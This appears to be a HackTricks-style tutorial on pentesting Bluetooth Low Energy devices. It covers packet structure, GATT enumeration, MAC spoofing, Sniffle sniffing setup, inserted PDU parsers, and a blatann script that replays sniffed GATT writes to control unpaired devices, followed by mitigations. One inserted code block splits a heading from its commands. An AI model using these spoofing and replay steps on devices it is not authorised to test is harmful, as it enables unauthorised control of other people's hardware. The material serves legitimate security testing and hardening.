Pentesting BLE - Bluetooth Low Energy
tip
Learn and practise AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practise GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practise Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Introduction
Available since the Bluetooth 4.0 specification, BLE uses only 40 channels covering the range 2400 to 2483.5 MHz; three of them (37, 38 and 39) are reserved for advertising. By contrast, classic Bluetooth uses 79 channels in the same range.
BLE devices communicate by sending advertising packets (beacons); these packets announce the existence of the BLE device to other nearby devices. The beacons sometimes carry data too (up to 31 bytes of advertising data in a legacy advertising PDU).
The listening device, also called a central device, can respond to an advertising packet with a SCAN request sent specifically to the advertising device. The response to that scan uses the same structure as the advertising packet, with additional information that did not fit in the initial advertising packet, such as the full device name.
The preamble byte lets the receiver synchronise its frequency and symbol timing, while the four-byte access address is a connection identifier (every advertising packet uses the fixed value 0x8E89BED6; each connection gets its own randomly chosen value), which is how receivers tell connections apart when several devices exchange packets on the same channels. After that, the Protocol Data Unit (PDU) carries the advertising data. There are several PDU types; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the ADV_NONCONN_IND PDU type when they don't accept connections, so they only send data in the advertising packet. Devices use ADV_IND when they allow connections, and they stop sending advertising packets once a connection is established.
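To make the packet layout above concrete, here is an added example (written for this page; it is not code from the page or from any tool it references) that decodes a legacy advertising PDU: the header byte (PDU type and TxAdd bit), the advertiser address, and the AD structures inside the advertising data. Both sample PDUs are constructed for the example: the first reuses the page's A4:CF:12:6C:B3:76 address, while the device name "BLE-Buzzer" and the random address of the second one are made up.

```python
import struct

# Advertising PDU types from the 4-bit header field (LL advertising channel PDUs)
PDU_TYPES = {
    0x0: "ADV_IND", 0x1: "ADV_DIRECT_IND", 0x2: "ADV_NONCONN_IND", 0x3: "SCAN_REQ",
    0x4: "SCAN_RSP", 0x5: "CONNECT_IND", 0x6: "ADV_SCAN_IND",
}
CONNECTABLE = {"ADV_IND", "ADV_DIRECT_IND"}
# Common AD types carried in AdvData / ScanRspData (Bluetooth Assigned Numbers)
AD_TYPES = {
    0x01: "Flags", 0x02: "Incomplete16bitUUIDs", 0x03: "Complete16bitUUIDs",
    0x08: "ShortenedLocalName", 0x09: "CompleteLocalName", 0xFF: "ManufacturerData",
}


def parse_ad_structures(adv_data: bytes) -> list:
    """Split AdvData into its [length][type][data...] AD structures."""
    out, i = [], 0
    while i < len(adv_data):
        length = adv_data[i]
        if length == 0:            # zero-length entry: the rest is padding
            break
        if i + 1 + length > len(adv_data):
            raise ValueError("AD structure overruns AdvData (truncated or malformed)")
        ad_type = adv_data[i + 1]
        payload = adv_data[i + 2 : i + 1 + length]
        entry = {"type": AD_TYPES.get(ad_type, f"0x{ad_type:02x}"), "raw": payload}
        if ad_type == 0x01 and payload:
            entry["le_general_discoverable"] = bool(payload[0] & 0x02)
            entry["br_edr_not_supported"] = bool(payload[0] & 0x04)
        elif ad_type in (0x08, 0x09):
            entry["name"] = payload.decode("utf-8", errors="replace")
        elif ad_type in (0x02, 0x03):
            even = payload[: len(payload) // 2 * 2]   # 16-bit UUIDs, little-endian
            entry["uuids"] = [f"0x{u:04x}" for (u,) in struct.iter_unpack("<H", even)]
        out.append(entry)
        i += 1 + length
    return out


def parse_adv_pdu(pdu: bytes) -> dict:
    """Decode the 2-byte header, AdvA and AdvData of an ADV_*/SCAN_RSP PDU."""
    if len(pdu) < 8:
        raise ValueError("PDU too short for header + AdvA")
    header, length = pdu[0], pdu[1]
    if length != len(pdu) - 2:
        raise ValueError(f"header length {length} does not match payload ({len(pdu) - 2})")
    pdu_type = PDU_TYPES.get(header & 0x0F, f"reserved_{header & 0x0F}")
    if pdu_type in ("SCAN_REQ", "CONNECT_IND", "ADV_DIRECT_IND"):
        raise ValueError(f"{pdu_type} carries no AdvData; not handled here")
    tx_add = (header >> 6) & 0x01                              # bit 6: advertiser address type
    adv_addr = ":".join(f"{b:02X}" for b in pdu[2:8][::-1])   # address is sent LSB first
    return {
        "pdu_type": pdu_type,
        "connectable": pdu_type in CONNECTABLE,
        "adv_addr": adv_addr,
        "addr_type": "random" if tx_add else "public",
        "ad": parse_ad_structures(pdu[8:]),
    }


# Constructed samples (not real captures). The first address is the page's example MAC;
# the name "BLE-Buzzer" and the static random address below are made up.
SAMPLE_ADV_IND = bytes.fromhex(
    "0019"                                    # header: ADV_IND, TxAdd=0 (public); length 25
    "76b36c12cfa4"                            # AdvA (LSB first) -> A4:CF:12:6C:B3:76
    "020106"                                  # Flags: LE General Discoverable, no BR/EDR
    "03030218"                                # Complete list of 16-bit UUIDs: 0x1802
    "0b09" + "BLE-Buzzer".encode().hex()      # Complete Local Name
)
SAMPLE_NONCONN = bytes.fromhex(
    "420f"                                    # header: ADV_NONCONN_IND, TxAdd=1 (random); length 15
    "c122112e7ad3"                            # AdvA -> D3:7A:2E:11:22:C1 (static random)
    "020104"                                  # Flags: BR/EDR not supported only
    "05ff5900aabb"                            # Manufacturer data, company 0x0059 (Nordic)
)

if __name__ == "__main__":
    for sample in (SAMPLE_ADV_IND, SAMPLE_NONCONN):
        print(parse_adv_pdu(sample))
```

The connectable flag is what decides your next step: an ADV_IND advertiser can be connected to and its GATT enumerated, an ADV_NONCONN_IND beacon can only be sniffed. Feeding the parser a PDU whose AD lengths run past the end raises instead of silently truncating, which is the case you hit with malformed or firmware-bugged beacons.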
GATT
The Generic Attribute Profile (GATT) defines how the device should format and transfer data. When you analyse a BLE device's attack surface, you will often concentrate on the GATT (or GATTs), because that is how device functionality gets triggered and how data is stored, grouped and modified. The GATT lists a device's characteristics, descriptors and services in a table: every attribute is addressed by a 16-bit handle and typed by a UUID, either a 16-bit (or 32-bit) Bluetooth SIG-assigned short form or a full 128-bit vendor UUID. A characteristic is a data value sent between the central device and the peripheral. These characteristics can have descriptors that provide additional information about them. Characteristics are often grouped in services when they are related to performing a specific action.
Enumeration
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe bluetooth   # load the module (modprobe -c only prints the modprobe config)
sudo hciconfig hci0 down && sudo hciconfig hci0 up
# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
GATTool
GATTool lets you establish a connection with another device, list that device's characteristics, and read and write its attributes.
GATTTool can start an interactive shell with the -I option:
gatttool -i hci0 -I
[ ][LE]> connect A4:CF:12:6C:B3:76
Attempting to connect to A4:CF:12:6C:B3:76
Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16
# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
Bettercap
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported
# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
Sniffing and actively controlling unpaired BLE devices
Many cheap BLE peripherals don't enforce pairing/bonding. Without bonding, Link Layer encryption is never enabled, so ATT/GATT traffic is sent in cleartext. An off-path sniffer can follow the connection and decode the GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.
Sniffing with Sniffle (CC26x2/CC1352)
Hardware: a Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group's Sniffle firmware.
Install Sniffle and its Wireshark extcap on Linux:
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
    echo "[+] - Sniffle not installed! Installing at 1.10.0..."
    sudo mkdir -p /opt/sniffle
    sudo chown -R $USER:$USER /opt/sniffle
    pushd /opt/sniffle
    wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
    tar xvf v1.10.0.tar.gz
    # Install Wireshark extcap for user and root only
    mkdir -p $HOME/.local/lib/wireshark/extcap
    ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
    sudo mkdir -p /root/.local/lib/wireshark/extcap
    sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
    popd
else
    echo "[+] - Sniffle already installed at 1.10.0"
fi
Flash the Sonoff with the Sniffle firmware (make sure your serial device matches, e.g. /dev/ttyUSB0):
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
Capture in Wireshark via the Sniffle extcap and jump straight to state-changing writes by filtering:
_ws.col.info contains "Sent Write Command"
This highlights ATT Write Commands sent by the client; the handle and value often map directly to device actions (e.g. write 0x01 to a buzzer/alert characteristic, 0x00 to stop). Writes that expect an acknowledgement show up as "Sent Write Request" instead, so widen the filter (e.g. btatt.opcode == 0x52 || btatt.opcode == 0x12) if the first one matches nothing.
Sniffle CLI quick examples (the scripts live in the python_cli directory of the Sniffle checkout):
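The following added example (written for this page; it is not Sniffle, gatttool or bettercap code) decodes the ATT PDUs that both the gatttool `characteristics` listing in the GATT section and the "Sent Write Command" filter above are built on: Read By Type Responses carrying characteristic declarations (declaration handle, properties, value handle, UUID) and Write Requests/Commands (handle, value). It then resolves each sniffed write to its UUID and writability, and builds the write PDU a central would send to replay it. The ATT trace is constructed: the first two declarations mirror the gatttool output earlier on the page, and the Alert Level (0x2A06) characteristic at value handle 0x000b is an assumption chosen to match the handle used in the blatann script further down.

```python
import struct

ATT_OPCODES = {
    0x08: "Read By Type Request", 0x09: "Read By Type Response", 0x0A: "Read Request",
    0x0B: "Read Response", 0x12: "Write Request", 0x13: "Write Response",
    0x52: "Write Command", 0x1B: "Handle Value Notification",
}
# Characteristic properties bitfield, as shown by gatttool's "char properties"
PROPERTY_BITS = [
    (0x01, "broadcast"), (0x02, "read"), (0x04, "write-without-response"), (0x08, "write"),
    (0x10, "notify"), (0x20, "indicate"), (0x40, "authenticated-signed-write"), (0x80, "extended"),
]
BASE_UUID_SUFFIX = "0000-1000-8000-00805f9b34fb"


def decode_properties(props: int) -> list:
    return [name for bit, name in PROPERTY_BITS if props & bit]


def uuid_to_str(raw_le: bytes) -> str:
    """Render a little-endian 16- or 128-bit UUID the way gatttool prints it."""
    if len(raw_le) == 2:
        return f"0000{int.from_bytes(raw_le, 'little'):04x}-{BASE_UUID_SUFFIX}"
    if len(raw_le) == 16:
        h = raw_le[::-1].hex()
        return f"{h[:8]}-{h[8:12]}-{h[12:16]}-{h[16:20]}-{h[20:]}"
    raise ValueError(f"unsupported UUID length {len(raw_le)}")


def parse_characteristic_declarations(pdu: bytes) -> list:
    """Decode a Read By Type Response (0x09) carrying Characteristic Declarations.

    Each entry is decl_handle(2) | properties(1) value_handle(2) uuid(2 or 16),
    which is exactly what gatttool's `characteristics` command lists."""
    if not pdu or pdu[0] != 0x09:
        raise ValueError("not a Read By Type Response")
    pair_len, body = pdu[1], pdu[2:]
    if pair_len not in (7, 21) or not body or len(body) % pair_len:
        raise ValueError("malformed characteristic declaration list")
    chars = []
    for off in range(0, len(body), pair_len):
        decl_handle, props, value_handle = struct.unpack_from("<HBH", body, off)
        chars.append({
            "handle": decl_handle, "properties": props, "props": decode_properties(props),
            "value_handle": value_handle, "uuid": uuid_to_str(body[off + 5 : off + pair_len]),
        })
    return chars


def parse_write(pdu: bytes) -> dict:
    """Decode a Write Request (0x12, acknowledged) or Write Command (0x52, unacknowledged)."""
    if len(pdu) < 3 or pdu[0] not in (0x12, 0x52):
        raise ValueError("not an ATT write")
    (handle,) = struct.unpack_from("<H", pdu, 1)
    return {"opcode": ATT_OPCODES[pdu[0]], "acked": pdu[0] == 0x12, "handle": handle, "value": pdu[3:]}


def build_write(handle: int, value: bytes, acked: bool = False) -> bytes:
    """Build the ATT PDU a central sends to replay a write (the bytes behind
    `gatttool --char-write-req` / bettercap `ble.write`)."""
    return struct.pack("<BH", 0x12 if acked else 0x52, handle) + value


def replay_list(att_pdus: list) -> list:
    """From a sniffed ATT PDU sequence, map value handles to their declarations and
    collect every client write together with the UUID and writability it resolves to."""
    by_value_handle, writes = {}, []
    for pdu in att_pdus:
        if pdu[0] == 0x09:
            for c in parse_characteristic_declarations(pdu):
                by_value_handle[c["value_handle"]] = c
        elif pdu[0] in (0x12, 0x52):
            w = parse_write(pdu)
            decl = by_value_handle.get(w["handle"])
            w["uuid"] = decl["uuid"] if decl else None
            # 0x04 write-without-response | 0x08 write; None if the handle was never discovered
            w["known_writable"] = bool(decl["properties"] & 0x0C) if decl else None
            writes.append(w)
    return writes


# Constructed ATT trace (not a real capture). The first two declarations mirror the
# gatttool output on this page; the Alert Level entry at value handle 0x000b is assumed.
SAMPLE_CHAR_DECLS = bytes.fromhex(
    "0907"
    "0200" "20" "0300" "052a"   # decl 0x0002: indicate, value handle 0x0003, Service Changed
    "1500" "02" "1600" "002a"   # decl 0x0015: read, value handle 0x0016, Device Name
    "0a00" "04" "0b00" "062a"   # decl 0x000a: write-without-response, value 0x000b, Alert Level
)
SAMPLE_TRACE = [
    SAMPLE_CHAR_DECLS,
    bytes.fromhex("52" "0b00" "01"),    # Write Command: handle 0x000b <- 0x01 (start)
    bytes.fromhex("52" "0b00" "00"),    # Write Command: handle 0x000b <- 0x00 (stop)
    bytes.fromhex("12" "1600" "4142"),  # Write Request to the read-only Device Name handle
]

if __name__ == "__main__":
    for w in replay_list(SAMPLE_TRACE):
        print(w)
```

Run it directly to print the resolved writes; with real traffic, feed the btatt payload bytes exported from Wireshark to replay_list to get the handle/value pairs to replay with gatttool or ble.write. A write whose known_writable is False or None is still worth trying against the peripheral: the server enforces permissions at write time, not the properties byte in the declaration, and a sloppy firmware may accept it anyway.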
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
Alternative sniffer: Nordic's nRF Sniffer for BLE + Wireshark plugin also works. On small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so either keep a dedicated sniffer dongle or you will need a J-Link/JTAG to restore the bootloader later.
Active control via GATT
Once you have identified a writable characteristic handle and value from the sniffed traffic, connect as any central and perform the same write:
- With Nordic nRF Connect for Desktop (BLE app):
  - Select the nRF52/nRF52840 dongle, scan and connect to the target.
  - Browse the GATT database and locate the target characteristic (it often has a friendly name, e.g. Alert Level).
  - Perform a Write with the sniffed bytes (e.g. 01 to activate, 00 to stop).
- Automate on Windows with a Nordic dongle using Python + blatann:
import time
import blatann

# CONFIG
COM_PORT = "COM29"                  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"    # Replace with your target MAC
# ",p" = public address, ",r" = random address (check the TxAdd bit in the sniffed advertisement)
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
    print("[!] Connection failed.")
    ble_device.close()
    raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle (the value handle seen in the sniffed Write Command)
for service in peer.database.services:
    for ch in service.characteristics:
        if ch.handle == 0x000b:  # Replace with your handle
            print("[!] Beeping.")
            ch.write(b"\x01").wait()   # wait for the write to complete before sleeping
            time.sleep(2)
            print("[+] And relax.")
            ch.write(b"\x00").wait()   # and before disconnecting, so the stop write is actually sent

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
Operational notes and mitigations
- Preferred: Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as backup.
- Without pairing/bonding, any nearby attacker can observe writes and replay or craft their own against unauthenticated writable characteristics.
- Mitigations: require pairing/bonding and enforce encryption (note that Just Works pairing encrypts the link but gives no MITM protection; use passkey or OOB pairing where the device has the I/O for it); set characteristic permissions so that writes require an authenticated, encrypted link; minimise unauthenticated writable characteristics; verify the result with Sniffle/nRF Connect by writing from an unpaired central and confirming the server answers with ATT Insufficient Authentication or Insufficient Encryption instead of accepting the write.
References
- Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners
- Sniffle – A sniffer for Bluetooth 5 and 4.x LE (NCC Group)
- Firmware installation for Sonoff USB Dongle (Sniffle README)
- Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)
- Nordic nRF Sniffer for Bluetooth LE
- nRF Connect for Desktop
- blatann – Python BLE library for Nordic devices